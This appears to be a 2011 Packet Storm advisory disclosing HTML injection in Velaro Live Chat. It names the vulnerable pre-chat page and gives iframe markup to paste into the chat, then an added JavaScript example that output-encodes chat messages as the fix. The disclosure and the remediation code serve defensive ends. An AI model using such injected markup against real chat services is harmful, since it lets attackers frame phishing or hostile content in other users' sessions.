Velaro Live Chat HTML Injection

2011-08-29T00:00:00
ID PACKETSTORM:104564
Type packetstorm
Reporter Sony
Modified 2011-08-29T00:00:00

Description

                                        
`# Exploit Title: Velaro Live Chat Software Cross Site Scripting  
# Date: 29.08.2011  
# Author: Sony  
# Software Link: http://www.velaro.com/features/live-chat  
# Version: all versions  
# POC:  
http://st2tea.blogspot.com/2011/08/velaro-live-chat-software-cross-site.html  
  
..................................................................  
  
This is an HTML code injection in the Velaro Live Chat software:  
  
http://www.velaro.com/Portals/0/prechat-choose.html  
  
Put our code in the chat:  
  
< iframe width="420" height="345" src="  
http://www.youtube.com/embed/dzLbdsEV9iQ" frameborder="0"  
allowfullscreen></iframe >  
  
or  
  
< iframe src="http://st2tea.blogspot.com/" >  
  
Some pics:  
  
http://i52.tinypic.com/7122hw.jpg  
  
http://i55.tinypic.com/jaklsl.jpg  
`
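
The remedy for this class of bug is to encode chat text on output, so that markup typed by a visitor is displayed instead of parsed. The block below is an added example, not Velaro's code and not part of the original advisory; it goes slightly beyond the advisory by also showing how plain http(s) URLs can still be rendered as links. The function names, CSS classes and the sample message are assumptions.

```javascript
// Added example, not Velaro code. All names here are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const URL_RE = /(https?:\/\/[^\s<>"']+)/g; // capture group keeps URLs in split() output

// Encode every character that can open a tag, an attribute or an entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the transcript row for one chat message. Visitor input is treated
// as text: markup is encoded, and only plain http(s) URLs become links.
function renderChatMessage(sender, message) {
  const body = String(message)
    .split(URL_RE)
    .map((part, i) => {
      const safe = escapeHtml(part);
      // Odd indexes are the URL captures; everything else is ordinary text.
      return i % 2 === 1
        ? `<a href="${safe}" rel="noopener noreferrer nofollow">${safe}</a>`
        : safe;
    })
    .join('');
  return `<div class="msg"><span class="from">${escapeHtml(sender)}</span>: ${body}</div>`;
}

// Constructed sample input in the shape of the markup shown in the advisory.
const SAMPLE = '<iframe src="http://example.invalid/"></iframe>';

// Tag names present in rendered output; only div, span and a should appear.
function tagsIn(html) {
  const found = (html.match(/<\/?[a-z]+/gi) || []).map((t) => t.replace(/[<\/]/g, '').toLowerCase());
  return [...new Set(found)];
}

console.log(renderChatMessage('Visitor', SAMPLE));
console.log(tagsIn(renderChatMessage('Visitor', SAMPLE)));
```

Encoding has to happen wherever the transcript is built, for both the visitor's and the agent's view, since the injected frame renders in whichever side displays the message.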